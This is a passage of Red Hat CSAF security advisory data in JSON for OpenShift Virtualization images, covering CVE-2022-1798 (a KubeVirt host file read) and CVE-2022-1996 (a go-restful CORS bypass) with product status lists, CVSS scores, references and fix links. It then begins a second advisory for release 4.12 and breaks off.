"8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2117872" } ], "notes": [ { "category": "description", "text": "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", "title": "Vulnerability description" }, { "category": "summary", "text": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64" ], "known_not_affected": [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-1798" }, { "category": "external", "summary": "RHBZ#2117872", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-1798", "url": "https://www.cve.org/CVERecord?id=CVE-2022-1798" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798" }, { "category": "external", "summary": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", "url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm" } ], "release_date": "2022-08-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-06T14:00:38+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6351" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs" }, { "cve": "CVE-2022-1996", "cwe": { "id": "CWE-639", "name": "Authorization Bypass Through User-Controlled Key" }, "discovery_date": "2022-06-08T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2094982" } ], "notes": [ { "category": "description", "text": "A flaw was found in CORS Filter feature from the go-restful package. When a user inputs a domain which is in AllowedDomains, all domains starting with the same pattern are accepted. This issue could allow an attacker to break the CORS policy by allowing any page to make requests and retrieve data on behalf of users.", "title": "Vulnerability description" }, { "category": "summary", "text": "go-restful: Authorization Bypass Through User-Controlled Key", "title": "Vulnerability summary" }, { "category": "other", "text": "The go-restful package is a transitive dependency which is being pulled with k8s.io/api and not directly being used anywhere in OpenShift Container Platform (OCP), OpenShift Container Storage, OpenShift Data Foundation, OpenShift Do and OpenShift Pipelines, hence these components are marked as \u0027Will not fix\u0027 or even \"Not affected\".", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64" ], "known_not_affected": [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-1996" }, { "category": "external", "summary": "RHBZ#2094982", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094982" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-1996", "url": "https://www.cve.org/CVERecord?id=CVE-2022-1996" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1996" } ], "release_date": "2022-06-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-06T14:00:38+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6351" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "go-restful: Authorization Bypass Through User-Controlled Key" } ] }
rhsa-2023_0408
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "OpenShift Virtualization is Red Hat\u0027s virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)\n\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n\n* golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* 